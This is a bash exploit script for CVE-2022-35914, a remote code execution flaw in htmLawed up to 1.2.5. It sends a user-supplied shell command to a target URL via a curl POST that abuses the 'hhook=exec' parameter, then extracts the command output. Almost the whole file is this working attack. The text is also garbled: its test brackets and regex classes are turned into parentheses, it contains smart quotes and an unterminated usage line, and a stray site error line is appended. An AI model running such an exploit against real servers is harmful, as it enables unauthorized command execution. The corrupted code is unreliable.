#!/bin/bash
# Exploit Title: htmlLawed <= 1.2.5 - Remote Code Execution
# Date: 2024-05-02
# Exploit Author: Miguel Redondo (aka d4t4s3c)
# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
# Software Link: https://github.com/kesar/HTMLawed
# Version: <= 1.2.5
# Tested on: Linux
# Category: Web Application
# CVE: CVE-2022-35914
while getopts ":u:c:" arg; do
case ${arg} in
u) url=${OPTARG}; let parameter_counter+=1 ;;
c) cmd=${OPTARG}; let parameter_counter+=1 ;;
esac
done
if ( -z "${url}" ) || ( -z "${cmd}" ); then
echo -e "\n
htmlLawed <= 1.2.5 - Remote Code Execution"
echo -e "\n(-) Usage: CVE-2022-35914.sh -u
exit 1
else
echo -e “\nhtmlLawed <= 1.2.5 - Remote Code Execution"
echo -e "\n(+) Executing Command: ${cmd}\n"
cmd_output=$(curl -s -d "sid=foo&hhook=exec&text=${cmd}" -b "sid=foo" ${url} | egrep '\ \((0-9)+\) =\>' | sed -E 's/\ \((0-9)+\) =\> (.*)
/\1/’)
echo -e “${cmd_output}\n”
exit 0
fi
GIPHY App Key not set. Please check settings